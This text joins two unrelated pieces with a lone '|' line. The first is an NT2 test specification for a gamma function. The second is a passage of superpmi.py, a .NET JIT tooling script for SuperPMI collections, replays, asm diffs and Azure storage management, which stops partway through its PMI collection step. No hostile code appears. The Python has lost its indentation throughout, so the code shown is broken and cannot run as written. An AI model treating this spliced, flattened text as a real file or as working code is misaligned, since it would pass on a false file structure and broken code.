[ ## this file was manually modified by jt
{
'functor' : {
'arity' : '1',
'call_types' : [],
'ret_arity' : '0',
'rturn' : {
'default' : 'typename boost::result_of<nt2::meta::floating(T)>::type',
},
'simd_types' : ['real_'],
'type_defs' : [],
'types' : ['real_'],
'simd_ulp_thresh' : '25.0'
},
'info' : 'manually modified',
'unit' : {
'global_header' : {
'first_stamp' : 'created by jt the 22/02/2011',
'included' : ['extern "C" {long double cephes_gammal(long double);}'],
'notes' : [],
'stamp' : 'modified by jt the 22/02/2011',
},
'ranges' : {
'real_' : [['T(0)', 'T(10)']],
},
'specific_values' : {
'real_' : {
'nt2::Inf<T>()' : {'result' : 'nt2::Inf<r_t>()','ulp_thresh' : '0',},
'nt2::Minf<T>()' : {'result' : 'nt2::Nan<r_t>()','ulp_thresh' : '0',},
'nt2::Mone<T>()' : {'result' : 'nt2::Nan<r_t>()','ulp_thresh' : '0',},
'nt2::Nan<T>()' : {'result' : 'nt2::Nan<r_t>()','ulp_thresh' : '0',},
'nt2::One<T>()' : {'result' : 'nt2::One<r_t>()','ulp_thresh' : '0',},
'nt2::Zero<T>()' : {'result' : 'nt2::Inf<r_t>()','ulp_thresh' : '0',},
},
},
'verif_test' : {
'nb_rand' : {
'default' : 'NT2_NB_RANDOM_TEST',
},
'property_call' : {
'default' : ['nt2::gamma(a0)'],
},
'property_value' : {
'default' : ['cephes_gammal(a0)'],
},
'ulp_thresh' : {
'default' : ['25.0'],
},
},
},
},
]
|
#!/usr/bin/env python3
#
## Licensed to the .NET Foundation under one or more agreements.
## The .NET Foundation licenses this file to you under the MIT license.
#
##
# Title : superpmi.py
#
# Notes:
#
# Script to orchestrate SuperPMI collections, replays, asm diffs, and SuperPMI
# data management. Note that some of the options provided by this script are
# also provided in our SuperPMI collect test. The test can be found here:
# https://github.com/dotnet/runtime/blob/master/src/tests/JIT/superpmi/superpmicollect.cs.
#
################################################################################
################################################################################
import argparse
import asyncio
import datetime
import locale
import logging
import os
import multiprocessing
import platform
import shutil
import subprocess
import sys
import tempfile
import queue
import re
import urllib
import urllib.request
import zipfile
from coreclr_arguments import *
locale.setlocale(locale.LC_ALL, '') # Use '' for auto, or force e.g. to 'en_US.UTF-8'
################################################################################
# Azure Storage information
################################################################################
# We store several things in Azure Blob Storage:
# 1. SuperPMI collections
# 2. A copy of PMI.dll, as a fallback in case we need it but can't find it locally,
# so we don't need to download dotnet/jitutils and build it ourselves.
# (Note: if PMI is ever published as a package, we could just download that instead.)
# 3. A copy of coredistools. If, when doing asm diffs, a copy of the coredistools
# library is not found in the Core_Root directory, we download a cached copy.
# Note: it would be better to download and use the official coredistools
# NuGet packages (like the setup-stress-dependencies scripts do).
az_account_name = "clrjit2"
az_superpmi_container_name = "superpmi"
az_collections_root_folder = "collections"
az_blob_storage_account_uri = "https://" + az_account_name + ".blob.core.windows.net/"
az_blob_storage_superpmi_container_uri = az_blob_storage_account_uri + az_superpmi_container_name
az_jitrollingbuild_container_name = "jitrollingbuild"
az_builds_root_folder = "builds"
az_blob_storage_jitrollingbuild_container_uri = az_blob_storage_account_uri + az_jitrollingbuild_container_name
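# For example, az_blob_storage_superpmi_container_uri evaluates to
# "https://clrjit2.blob.core.windows.net/superpmi".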
################################################################################
# Argument Parser
################################################################################
description = """\
Script to run SuperPMI replay, ASM diffs, and collections.
The script also manages the Azure store of pre-created SuperPMI collection files.
Help for each individual command can be shown by asking for help on the individual command, for example
`superpmi.py collect --help`.
"""
collect_description = """\
Automate a SuperPMI collection.
"""
replay_description = """\
Run SuperPMI replay on one or more collections.
"""
asm_diff_description = """\
Run SuperPMI ASM diffs on one or more collections.
"""
upload_description = """\
Upload a collection to SuperPMI Azure storage.
"""
download_description = """\
Download collections from SuperPMI Azure storage.
Normally, collections are automatically downloaded to a local cache
as part of doing a 'replay' operation. This command allows you to
download without doing a 'replay'.
"""
list_collections_description = """\
List the existing collections in the SuperPMI Azure storage.
"""
merge_mch_description = """\
Utility command to merge MCH files. This is a thin wrapper around
'mcs -merge -recursive -dedup -thin' followed by 'mcs -toc'.
"""
spmi_log_file_help = "Write SuperPMI tool output to a log file. Requires --sequential."
jit_ee_version_help = """\
JIT/EE interface version (the JITEEVersionIdentifier GUID from jiteeversionguid.h in the format
'a5eec3a4-4176-43a7-8c2b-a05b551d4f49'). Default: if the mcs tool is found, assume it
was built with the same JIT/EE version as the JIT we are using, and run "mcs -printJITEEVersion"
to get that version. Otherwise, use "unknown-jit-ee-version".
"""
host_os_help = "OS (windows, OSX, Linux). Default: current OS."
arch_help = "Architecture (x64, x86, arm, arm64). Default: current architecture."
target_os_help = "Target OS, for use with cross-compilation JIT (windows, OSX, Linux). Default: current OS."
target_arch_help = "Target architecture, for use with cross-compilation JIT (x64, x86, arm, arm64). Passed as asm diffs target to SuperPMI. Default: current architecture."
mch_arch_help = "Architecture of MCH files to download, used for cross-compilation altjit (x64, x86, arm, arm64). Default: target architecture."
build_type_help = "Build type (Debug, Checked, Release). Default: Checked."
core_root_help = "Core_Root location. Optional; it will be deduced if possible from runtime repo root."
log_level_help = """\
Console log level (output verbosity level).
One of: critical, error, warning, info, debug.
Output from this level and higher is output to the console.
All output is always written to the log file.
Default: warning.
"""
log_file_help = "Output log file path. If not specified, a default location is chosen."
product_location_help = "Built Product directory location. Optional; it will be deduced if possible from runtime repo root."
spmi_location_help = """\
Directory in which to put SuperPMI files, such as downloaded MCH files, asm diffs, and repro .MC files.
Optional. Default is 'spmi' within the repo 'artifacts' directory.
"""
superpmi_collect_help = """\
Command to run SuperPMI collect over. Note that there cannot be any dotnet CLI commands
invoked inside this command, as they will fail due to the shim JIT being set.
"""
replay_mch_files_help = """\
MCH files, or directories containing MCH files, to use for replay. For each directory passed,
all recursively found MCH files in that directory root will be used. Files may either be a path
on disk or a URI to an MCH file to download. Use these MCH files instead of a collection from
the Azure Storage MCH file store. UNC paths will be downloaded and cached locally.
"""
filter_help = """\
Specify one or more filters to restrict the set of MCH files to download or use from the local cache.
A filter is a simple case-insensitive substring search against the MCH file path. If multiple filter
strings are specified, any matching path is accepted (it is "or", not "and").
"""
upload_mch_files_help = """\
MCH files, or directories containing MCH files, to upload. For each directory passed,
all recursively found MCH files in that directory root will be uploaded. MCT files are also uploaded.
"""
skip_cleanup_help = "Skip intermediate file removal."
break_on_assert_help = "Enable break on assert during SuperPMI replay."
break_on_error_help = "Enable break on error during SuperPMI replay."
force_download_help = """\
If downloading an MCH file, always download it. Don't use an existing file in the download location.
Normally, we don't download if the target directory exists. This forces download even if the
target directory already exists.
"""
merge_mch_pattern_help = """\
A pattern describing the files to merge, passed through directly to `mcs -merge`.
Acceptable patterns include `*.mch`, `file*.mch`, and `c:\\my\\directory\\*.mch`.
Only the final component can contain a `*` wildcard; the directory path cannot.
"""
# Start of parser object creation.
parser = argparse.ArgumentParser(description=description)
subparsers = parser.add_subparsers(dest='mode', help="Command to invoke")
subparsers.required = True
# Create a parser for core_root. It can be specified directly,
# or computed from the script location and host OS, architecture, and build type:
#
# script location implies repo root,
# implies artifacts location,
# implies test location from host OS, architecture, build type,
# implies Core_Root path
#
# You normally use the default host OS, but for Azure Storage upload and other
# operations, it can be useful to allow it to be specified.
core_root_parser = argparse.ArgumentParser(add_help=False)
core_root_parser.add_argument("-arch", help=arch_help)
core_root_parser.add_argument("-build_type", default="Checked", help=build_type_help)
core_root_parser.add_argument("-host_os", help=host_os_help)
core_root_parser.add_argument("-core_root", help=core_root_help)
core_root_parser.add_argument("-log_level", help=log_level_help)
core_root_parser.add_argument("-log_file", help=log_file_help)
core_root_parser.add_argument("-spmi_location", help=spmi_location_help)
# Create a set of arguments common to target specification. Used for replay, upload, download, list-collections.
target_parser = argparse.ArgumentParser(add_help=False)
target_parser.add_argument("-target_arch", help=target_arch_help)
target_parser.add_argument("-target_os", help=target_os_help)
target_parser.add_argument("-mch_arch", help=mch_arch_help)
# Create a set of arguments common to all commands that run SuperPMI.
superpmi_common_parser = argparse.ArgumentParser(add_help=False)
superpmi_common_parser.add_argument("--break_on_assert", action="store_true", help=break_on_assert_help)
superpmi_common_parser.add_argument("--break_on_error", action="store_true", help=break_on_error_help)
superpmi_common_parser.add_argument("--skip_cleanup", action="store_true", help=skip_cleanup_help)
superpmi_common_parser.add_argument("--sequential", action="store_true", help="Run SuperPMI in sequential mode. Default is to run in parallel for faster runs.")
superpmi_common_parser.add_argument("-spmi_log_file", help=spmi_log_file_help)
superpmi_common_parser.add_argument("-jit_name", help="Specify the filename of the jit to use, e.g., 'clrjit_win_arm64_x64.dll'. Default is clrjit.dll/libclrjit.so")
superpmi_common_parser.add_argument("--altjit", action="store_true", help="Set the altjit variables on replay.")
# subparser for collect
collect_parser = subparsers.add_parser("collect", description=collect_description, parents=[core_root_parser, target_parser, superpmi_common_parser])
# Add required arguments
collect_parser.add_argument("collection_command", nargs='?', help=superpmi_collect_help)
collect_parser.add_argument("collection_args", nargs='?', help="Arguments to pass to the SuperPMI collect command. This is a single string; quote it if necessary if the arguments contain spaces.")
collect_parser.add_argument("--pmi", action="store_true", help="Run PMI on a set of directories or assemblies.")
collect_parser.add_argument("--crossgen", action="store_true", help="Run crossgen on a set of directories or assemblies.")
collect_parser.add_argument("--crossgen2", action="store_true", help="Run crossgen2 on a set of directories or assemblies.")
collect_parser.add_argument("-assemblies", dest="assemblies", nargs="+", default=[], help="A list of managed dlls or directories to recursively use while collecting with PMI, crossgen, or crossgen2. Required if --pmi, --crossgen, or --crossgen2 is specified.")
collect_parser.add_argument("-exclude", dest="exclude", nargs="+", default=[], help="A list of files or directories to exclude from the files and directories specified by `-assemblies`.")
collect_parser.add_argument("-pmi_location", help="Path to pmi.dll to use during PMI run. Optional; pmi.dll will be downloaded from Azure Storage if necessary.")
collect_parser.add_argument("-output_mch_path", help="Location to place the final MCH file.")
collect_parser.add_argument("--merge_mch_files", action="store_true", help="Merge multiple MCH files. Use the -mch_files flag to pass a list of MCH files to merge.")
collect_parser.add_argument("-mch_files", metavar="MCH_FILE", nargs='+', help="Pass a sequence of MCH files which will be merged. Required by --merge_mch_files.")
collect_parser.add_argument("--use_zapdisable", action="store_true", help="Sets COMPlus_ZapDisable=1 and COMPlus_ReadyToRun=0 when doing collection to cause NGEN/ReadyToRun images to not be used, and thus causes JIT compilation and SuperPMI collection of these methods.")
# Allow for continuing a collection in progress
collect_parser.add_argument("-temp_dir", help="Specify an existing temporary directory to use. Useful if continuing an ongoing collection process, or forcing a temporary directory to a particular hard drive. Optional; default is to create a temporary directory in the usual TEMP location.")
collect_parser.add_argument("--skip_collection_step", action="store_true", help="Do not run the collection step.")
collect_parser.add_argument("--skip_merge_step", action="store_true", help="Do not run the merge step.")
collect_parser.add_argument("--skip_clean_and_verify_step", action="store_true", help="Do not run the collection cleaning, TOC creation, and verifying step.")
collect_parser.add_argument("--skip_collect_mc_files", action="store_true", help="Do not collect .MC files")
# Create a set of arguments common to all SuperPMI replay commands, namely basic replay and ASM diffs.
# Note that SuperPMI collection also runs a replay to verify the final MCH file, so many
# of the replay arguments apply to that verification replay as well.
replay_common_parser = argparse.ArgumentParser(add_help=False)
replay_common_parser.add_argument("-mch_files", metavar="MCH_FILE", nargs='+', help=replay_mch_files_help)
replay_common_parser.add_argument("-filter", nargs='+', help=filter_help)
replay_common_parser.add_argument("-product_location", help=product_location_help)
replay_common_parser.add_argument("--force_download", action="store_true", help=force_download_help)
replay_common_parser.add_argument("-jit_ee_version", help=jit_ee_version_help)
# subparser for replay
replay_parser = subparsers.add_parser("replay", description=replay_description, parents=[core_root_parser, target_parser, superpmi_common_parser, replay_common_parser])
# Add required arguments
replay_parser.add_argument("-jit_path", help="Path to clrjit. Defaults to Core_Root JIT.")
# subparser for asmdiffs
asm_diff_parser = subparsers.add_parser("asmdiffs", description=asm_diff_description, parents=[core_root_parser, target_parser, superpmi_common_parser, replay_common_parser])
# Add required arguments
asm_diff_parser.add_argument("-base_jit_path", help="Path to baseline clrjit. Defaults to baseline JIT from rolling build, by computing baseline git hash.")
asm_diff_parser.add_argument("-diff_jit_path", help="Path to diff clrjit. Defaults to Core_Root JIT.")
asm_diff_parser.add_argument("-git_hash", help="Use this git hash as the current hash for use to find a baseline JIT. Defaults to current git hash of source tree.")
asm_diff_parser.add_argument("-base_git_hash", help="Use this git hash as the baseline JIT hash. Default: search for the baseline hash.")
asm_diff_parser.add_argument("--diff_jit_dump", action="store_true", help="Generate JitDump output for diffs. Default: only generate asm, not JitDump.")
asm_diff_parser.add_argument("-temp_dir", help="Specify a temporary directory used for a previous ASM diffs run (for which --skip_cleanup was used) to view the results. The replay command is skipped.")
asm_diff_parser.add_argument("--gcinfo", action="store_true", help="Include GC info in disassembly (sets COMPlus_JitGCDump/COMPlus_NgenGCDump; requires instructions to be prefixed by offsets).")
# subparser for upload
upload_parser = subparsers.add_parser("upload", description=upload_description, parents=[core_root_parser, target_parser])
upload_parser.add_argument("-mch_files", metavar="MCH_FILE", required=True, nargs='+', help=upload_mch_files_help)
upload_parser.add_argument("-az_storage_key", help="Key for the clrjit Azure Storage location. Default: use the value of the CLRJIT_AZ_KEY environment variable.")
upload_parser.add_argument("-jit_location", help="Location for the base clrjit. If not passed this will be assumed to be from the Core_Root.")
upload_parser.add_argument("-jit_ee_version", help=jit_ee_version_help)
upload_parser.add_argument("--skip_cleanup", action="store_true", help=skip_cleanup_help)
# subparser for download
download_parser = subparsers.add_parser("download", description=download_description, parents=[core_root_parser, target_parser])
download_parser.add_argument("-filter", nargs='+', help=filter_help)
download_parser.add_argument("-jit_ee_version", help=jit_ee_version_help)
download_parser.add_argument("--skip_cleanup", action="store_true", help=skip_cleanup_help)
download_parser.add_argument("--force_download", action="store_true", help=force_download_help)
download_parser.add_argument("-mch_files", metavar="MCH_FILE", nargs='+', help=replay_mch_files_help)
# subparser for list-collections
list_collections_parser = subparsers.add_parser("list-collections", description=list_collections_description, parents=[core_root_parser, target_parser])
list_collections_parser.add_argument("-jit_ee_version", help=jit_ee_version_help)
list_collections_parser.add_argument("--all", action="store_true", help="Show all MCH files, not just those for the specified (or default) JIT-EE version, OS, and architecture")
list_collections_parser.add_argument("--local", action="store_true", help="Show the local MCH download cache")
# subparser for merge-mch
merge_mch_parser = subparsers.add_parser("merge-mch", description=merge_mch_description, parents=[core_root_parser])
merge_mch_parser.add_argument("-output_mch_path", required=True, help="Location to place the final MCH file.")
merge_mch_parser.add_argument("-pattern", required=True, help=merge_mch_pattern_help)
################################################################################
# Helper functions
################################################################################
def is_zero_length_file(fpath):
""" Determine if a file system path refers to an existing file that is zero length
Args:
fpath (str) : file system path to test
Returns:
bool : true if the path is an existing file that is zero length
"""
return os.path.isfile(fpath) and os.stat(fpath).st_size == 0
def is_nonzero_length_file(fpath):
""" Determine if a file system path refers to an existing file that is non-zero length
Args:
fpath (str) : file system path to test
Returns:
bool : true if the path is an existing file that is non-zero length
"""
return os.path.isfile(fpath) and os.stat(fpath).st_size != 0
def make_safe_filename(s):
""" Turn a string into a string usable as a single file name component; replace illegal characters with underscores.
Args:
s (str) : string to convert to a file name
Returns:
(str) : The converted string
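    Example:
        make_safe_filename("base.mch;x64") returns "base_mch_x64": every character that
        is not a letter or digit is replaced by an underscore.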
"""
def safe_char(c):
if c.isalnum():
return c
else:
return "_"
return "".join(safe_char(c) for c in s)
def find_in_path(name, pathlist, match_func=os.path.isfile):
""" Find a name (e.g., directory name or file name) in the file system by searching the directories
in a `pathlist` (e.g., PATH environment variable that has been semi-colon
split into a list).
Args:
name (str) : name to search for
pathlist (list) : list of directory names to search
match_func (str -> bool) : determines if the name is a match
Returns:
(str) The pathname of the object, or None if not found.
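    Example (illustrative):
        find_in_path("clrjit.dll", os.environ["PATH"].split(os.pathsep)) returns the full
        path of the first clrjit.dll found in a PATH directory, or None.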
"""
for dirname in pathlist:
candidate = os.path.join(dirname, name)
if match_func(candidate):
return candidate
return None
def find_file(filename, pathlist):
""" Find a filename in the file system by searching the directories
in a `pathlist` (e.g., PATH environment variable that has been semi-colon
split into a list).
Args:
filename (str) : name to search for
pathlist (list) : list of directory names to search
Returns:
(str) The pathname of the object, or None if not found.
"""
return find_in_path(filename, pathlist)
def find_dir(dirname, pathlist):
""" Find a directory name in the file system by searching the directories
in a `pathlist` (e.g., PATH environment variable that has been semi-colon
split into a list).
Args:
dirname (str) : name to search for
pathlist (list) : list of directory names to search
Returns:
(str) The pathname of the object, or None if not found.
"""
return find_in_path(dirname, pathlist, match_func=os.path.isdir)
def create_unique_directory_name(root_directory, base_name):
""" Create a unique directory name by joining `root_directory` and `base_name`.
If this name already exists, append ".1", ".2", ".3", etc., to the final
name component until the full directory name is not found.
Args:
root_directory (str) : root directory in which a new directory will be created
base_name (str) : the base name of the new directory name component to be added
Returns:
(str) The full absolute path of the new directory. The directory has been created.
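    Example (illustrative):
        create_unique_directory_name(spmi_location, "repro.windows.x64.Checked") creates
        and returns <spmi_location>/repro.windows.x64.Checked, appending ".1", ".2", etc.,
        if that directory already exists.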
"""
root_directory = os.path.abspath(root_directory)
full_path = os.path.join(root_directory, base_name)
count = 1
while os.path.isdir(full_path):
new_full_path = os.path.join(root_directory, base_name + "." + str(count))
count += 1
full_path = new_full_path
os.makedirs(full_path)
return full_path
def get_files_from_path(path, match_func=lambda path: True):
""" Return all files in a directory tree matching a criteria.
Args:
path (str) : Either a single file to include, or a directory to traverse looking for matching
files.
match_func (str -> bool) : Criteria function determining if a file is added to the list
Returns:
Array of absolute paths of matching files
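    Example (illustrative):
        get_files_from_path(core_root, match_func=lambda f: f.endswith(".dll")) returns
        the absolute paths of all .dll files anywhere under core_root.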
"""
    if not (os.path.isdir(path) or os.path.isfile(path)):
logging.warning("Warning: \"%s\" is not a file or directory", path)
return []
path = os.path.abspath(path)
files = []
if os.path.isdir(path):
for item in os.listdir(path):
files += get_files_from_path(os.path.join(path, item), match_func)
else:
if match_func(path):
files.append(path)
return files
def run_and_log(command, log_level=logging.DEBUG):
""" Return a command and log its output to the debug logger
Args:
command (list) : Command to run
log_level (int) : log level to use for logging output (but not the "Invoking" text)
Returns:
Process return code
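    Example (illustrative):
        run_and_log(["mcs", "-toc", "base.mch"]) logs each output line at DEBUG level
        and returns the process exit code.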
"""
logging.debug("Invoking: %s", " ".join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout_output, _ = proc.communicate()
for line in stdout_output.decode('utf-8').splitlines(): # There won't be any stderr output since it was piped to stdout
logging.log(log_level, line)
return proc.returncode
def write_file_to_log(filepath, log_level=logging.DEBUG):
""" Read the text of a file and write it to the logger. If the file doesn't exist, don't output anything.
Args:
filepath (string) : file to log
log_level (int) : log level to use for logging output
Returns:
Nothing
"""
if not os.path.exists(filepath):
return
logging.log(log_level, "============== Contents of " + filepath)
with open(filepath) as file_handle:
lines = file_handle.readlines()
lines = [item.strip() for item in lines]
for line in lines:
logging.log(log_level, line)
logging.log(log_level, "============== End contents of " + filepath)
# Functions to verify the OS and architecture. They take an instance of CoreclrArguments,
# which is used to find the list of legal OS and architectures
def check_host_os(coreclr_args, host_os):
return (host_os is not None) and (host_os in coreclr_args.valid_host_os)
def check_target_os(coreclr_args, target_os):
return (target_os is not None) and (target_os in coreclr_args.valid_host_os)
def check_arch(coreclr_args, arch):
return (arch is not None) and (arch in coreclr_args.valid_arches)
def check_target_arch(coreclr_args, target_arch):
return (target_arch is not None) and (target_arch in coreclr_args.valid_arches)
def check_mch_arch(coreclr_args, mch_arch):
return (mch_arch is not None) and (mch_arch in coreclr_args.valid_arches)
################################################################################
# Helper classes
################################################################################
class TempDir:
""" Class to create a temporary working directory, or use one that is passed as an argument.
Use with: "with TempDir() as temp_dir" to change to that directory and then automatically
change back to the original working directory afterwards and remove the temporary
directory and its contents (if skip_cleanup is False).
"""
def __init__(self, path=None, skip_cleanup=False):
self.mydir = tempfile.mkdtemp() if path is None else path
self.cwd = None
self._skip_cleanup = skip_cleanup
def __enter__(self):
self.cwd = os.getcwd()
os.chdir(self.mydir)
return self.mydir
def __exit__(self, exc_type, exc_val, exc_tb):
os.chdir(self.cwd)
if not self._skip_cleanup:
shutil.rmtree(self.mydir)
class ChangeDir:
""" Class to temporarily change to a given directory. Use with "with".
"""
def __init__(self, mydir):
self.mydir = mydir
self.cwd = None
def __enter__(self):
self.cwd = os.getcwd()
os.chdir(self.mydir)
def __exit__(self, exc_type, exc_val, exc_tb):
os.chdir(self.cwd)
class AsyncSubprocessHelper:
""" Class to help with async multiprocessing tasks.
"""
def __init__(self, items, subproc_count=multiprocessing.cpu_count(), verbose=False):
self.items = items
self.subproc_count = subproc_count
self.verbose = verbose
self.subproc_count_queue = None
if 'win32' in sys.platform:
# Windows specific event-loop policy & cmd
asyncio.set_event_loop(asyncio.ProactorEventLoop())
async def __get_item__(self, item, index, size, async_callback, *extra_args):
""" Wrapper to the async callback which will schedule based on the queue
"""
# Wait for the subproc_id queue to become free, meaning we have an available
# processor to run a task (specifically, we are below our maximum allowed
# parallelism). Then start running the sub process.
subproc_id = await self.subproc_count_queue.get()
print_prefix = ""
if self.verbose:
print_prefix = "[{}:{}]: ".format(index, size)
await async_callback(print_prefix, item, *extra_args)
# Add back to the queue, in case another process wants to run.
self.subproc_count_queue.put_nowait(subproc_id)
async def __run_to_completion__(self, async_callback, *extra_args):
""" async wrapper for run_to_completion
"""
# Create a queue with one entry for each of the threads we're
# going to allow. By default, this will be one entry per CPU.
# Using subproc_count_queue.get() will block when we're running
# a task on every CPU.
chunk_size = self.subproc_count
self.subproc_count_queue = asyncio.Queue(chunk_size)
for item in range(chunk_size):
self.subproc_count_queue.put_nowait(item)
# Create a 'tasks' list of async function calls, one for each item.
# When all these calls complete, we're done.
size = len(self.items)
count = 1
tasks = []
for item in self.items:
tasks.append(self.__get_item__(item, count, size, async_callback, *extra_args))
count += 1
        # Invoke all the calls to __get_item__ concurrently and wait for them all to finish.
await asyncio.gather(*tasks)
def run_to_completion(self, async_callback, *extra_args):
""" Run until the item queue has been depleted
        Notes:
            Acts as a wrapper that abstracts the async calls to async_callback.
            At most `subproc_count` subprocesses (one per CPU by default) run at
            any time. The Python code itself is single-threaded; it relies on
            async/await to keep that many subprocesses in flight.
"""
        reset_env = os.environ.copy()
        loop = asyncio.get_event_loop()
        loop.run_until_complete(self.__run_to_completion__(async_callback, *extra_args))
        # Restore the original environment exactly: clear first so that variables added
        # during the run are removed, not merely overwritten.
        os.environ.clear()
        os.environ.update(reset_env)
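# Usage sketch for AsyncSubprocessHelper (hypothetical callback, for illustration only):
#
#     async def run_one(print_prefix, item):
#         proc = await asyncio.create_subprocess_shell("echo " + item)
#         await proc.communicate()
#
#     helper = AsyncSubprocessHelper(["a.dll", "b.dll"], verbose=True)
#     helper.run_to_completion(run_one)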
################################################################################
# SuperPMI Collect
################################################################################
class SuperPMICollect:
""" SuperPMI Collect class
Notes:
The object is responsible for setting up a SuperPMI collection given
the arguments passed into the script.
"""
def __init__(self, coreclr_args):
""" Constructor
Args:
coreclr_args (CoreclrArguments) : parsed args
"""
if coreclr_args.host_os == "OSX":
self.collection_shim_name = "libsuperpmi-shim-collector.dylib"
self.corerun_tool_name = "corerun"
self.crossgen_tool_name = "crossgen"
elif coreclr_args.host_os == "Linux":
self.collection_shim_name = "libsuperpmi-shim-collector.so"
self.corerun_tool_name = "corerun"
self.crossgen_tool_name = "crossgen"
elif coreclr_args.host_os == "windows":
self.collection_shim_name = "superpmi-shim-collector.dll"
self.corerun_tool_name = "corerun.exe"
self.crossgen_tool_name = "crossgen.exe"
else:
raise RuntimeError("Unsupported OS.")
self.jit_path = os.path.join(coreclr_args.core_root, determine_jit_name(coreclr_args))
self.superpmi_path = determine_superpmi_tool_path(coreclr_args)
self.mcs_path = determine_mcs_tool_path(coreclr_args)
self.core_root = coreclr_args.core_root
self.collection_command = coreclr_args.collection_command
        # `collection_args` arrives from argparse as a single string (or None); split it into
        # the argument list expected below (see the isinstance asserts in __collect_mc_files__).
        self.collection_args = coreclr_args.collection_args.split(" ") if coreclr_args.collection_args is not None else []
if coreclr_args.pmi:
self.pmi_location = determine_pmi_location(coreclr_args)
self.corerun = os.path.join(self.core_root, self.corerun_tool_name)
if coreclr_args.crossgen:
self.crossgen_tool = os.path.join(self.core_root, self.crossgen_tool_name)
if coreclr_args.crossgen2:
self.corerun = os.path.join(self.core_root, self.corerun_tool_name)
if coreclr_args.dotnet_tool_path is None:
self.crossgen2_driver_tool = self.corerun
else:
self.crossgen2_driver_tool = coreclr_args.dotnet_tool_path
logging.debug("Using crossgen2 driver tool %s", self.crossgen2_driver_tool)
if coreclr_args.pmi or coreclr_args.crossgen or coreclr_args.crossgen2:
self.assemblies = coreclr_args.assemblies
self.exclude = coreclr_args.exclude
self.coreclr_args = coreclr_args
# Pathname for a temporary .MCL file used for noticing SuperPMI replay failures against base MCH.
self.base_fail_mcl_file = None
# The base .MCH file path
self.base_mch_file = None
# Final .MCH file path
self.final_mch_file = None
# The .TOC file path for the clean thin unique .MCH file
self.toc_file = None
self.temp_location = None
############################################################################
# Instance Methods
############################################################################
def collect(self):
""" Do the SuperPMI Collection.
"""
# Do a basic SuperPMI collect and validation:
# 1. Collect MC files by running a set of sample apps.
# 2. Create a merged thin unique MCH by using "mcs -merge -recursive -dedup -thin base.mch *.mc".
# 3. Create a clean MCH by running SuperPMI over the MCH, and using "mcs -strip" to filter
# out any failures (if any).
# 4. Create a TOC using "mcs -toc".
# 5. Verify the resulting MCH file is error-free when running SuperPMI against it with the
# same JIT used for collection.
#
# MCH files are big. If we don't need them anymore, clean them up right away to avoid
# running out of disk space in disk constrained situations.
passed = False
try:
with TempDir(self.coreclr_args.temp_dir, self.coreclr_args.skip_cleanup) as temp_location:
# Setup all of the temp locations
self.base_fail_mcl_file = os.path.join(temp_location, "basefail.mcl")
self.base_mch_file = os.path.join(temp_location, "base.mch")
self.temp_location = temp_location
if self.coreclr_args.output_mch_path is not None:
self.final_mch_file = os.path.abspath(self.coreclr_args.output_mch_path)
final_mch_dir = os.path.dirname(self.final_mch_file)
if not os.path.isdir(final_mch_dir):
os.makedirs(final_mch_dir)
else:
default_coreclr_bin_mch_location = os.path.join(self.coreclr_args.spmi_location, "mch", "{}.{}.{}".format(self.coreclr_args.host_os, self.coreclr_args.arch, self.coreclr_args.build_type))
if not os.path.isdir(default_coreclr_bin_mch_location):
os.makedirs(default_coreclr_bin_mch_location)
self.final_mch_file = os.path.abspath(os.path.join(default_coreclr_bin_mch_location, "{}.{}.{}.mch".format(self.coreclr_args.host_os, self.coreclr_args.arch, self.coreclr_args.build_type)))
self.toc_file = "{}.mct".format(self.final_mch_file)
# If we have passed temp_dir, then we have a few flags we need
# to check to see where we are in the collection process. Note that this
# functionality exists to help not lose progress during a SuperPMI collection.
                # A SuperPMI collection can take many hours, so allow re-use of a collection
                # already in progress.
if not self.coreclr_args.skip_collection_step:
self.__collect_mc_files__()
if not self.coreclr_args.skip_merge_step:
if not self.coreclr_args.merge_mch_files:
self.__merge_mc_files__()
else:
self.__merge_mch_files__()
if not self.coreclr_args.skip_clean_and_verify_step:
self.__create_clean_mch_file__()
self.__create_toc__()
self.__verify_final_mch__()
passed = True
except Exception as exception:
logging.critical(exception)
return passed
############################################################################
# Helper Methods
############################################################################
def __collect_mc_files__(self):
""" Do the actual SuperPMI collection for a command
Returns:
None
"""
if not self.coreclr_args.skip_collect_mc_files:
assert os.path.isdir(self.temp_location)
# Set environment variables. For crossgen2, we need to pass the COMPlus variables as arguments to the JIT using
# the `-codegenopt` argument.
env_copy = os.environ.copy()
root_env = {}
root_env["SuperPMIShimLogPath"] = self.temp_location
root_env["SuperPMIShimPath"] = self.jit_path
complus_env = {}
complus_env["EnableExtraSuperPmiQueries"] = "1"
complus_env["TieredCompilation"] = "0"
if self.coreclr_args.use_zapdisable:
complus_env["ZapDisable"] = "1"
complus_env["ReadyToRun"] = "0"
logging.debug("Starting collection.")
logging.debug("")
            def set_and_report_env(env, root_env, complus_env=None):
for var, value in root_env.items():
env[var] = value
print_platform_specific_environment_vars(logging.DEBUG, self.coreclr_args, var, value)
if complus_env is not None:
for var, value in complus_env.items():
complus_var = "COMPlus_" + var
env[complus_var] = value
print_platform_specific_environment_vars(logging.DEBUG, self.coreclr_args, complus_var, value)
# If we need them, collect all the assemblies we're going to use for the collection(s).
# Remove the files matching the `-exclude` arguments (case-insensitive) from the list.
if self.coreclr_args.pmi or self.coreclr_args.crossgen or self.coreclr_args.crossgen2:
assemblies = []
for item in self.assemblies:
assemblies += get_files_from_path(item, match_func=lambda file: any(file.endswith(extension) for extension in [".dll", ".exe"]) and (self.exclude is None or not any(e.lower() in file.lower() for e in self.exclude)))
if len(assemblies) == 0:
logging.error("No assemblies found using `-assemblies` and `-exclude` arguments!")
else:
logging.debug("Using assemblies:")
for item in assemblies:
logging.debug(" %s", item)
logging.debug("") # add trailing empty line
################################################################################################ Do collection using given collection command (e.g., script)
if self.collection_command is not None:
logging.debug("Starting collection using command")
collection_command_env = env_copy.copy()
collection_complus_env = complus_env.copy()
collection_complus_env["JitName"] = self.collection_shim_name
set_and_report_env(collection_command_env, root_env, collection_complus_env)
logging.info("Collecting using command:")
logging.info(" %s %s", self.collection_command, " ".join(self.collection_args))
assert isinstance(self.collection_command, str)
assert isinstance(self.collection_args, list)
command = [self.collection_command, ] + self.collection_args
proc = subprocess.Popen(command, env=collection_command_env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout_output, _ = proc.communicate()
for line in stdout_output.decode('utf-8').splitlines(): # There won't be any stderr output since it was piped to stdout
logging.debug(line)
################################################################################################ end of "self.collection_command is not None"
################################################################################################ Do collection using PMI
if self.coreclr_args.pmi is True:
logging.debug("Starting collection using PMI")
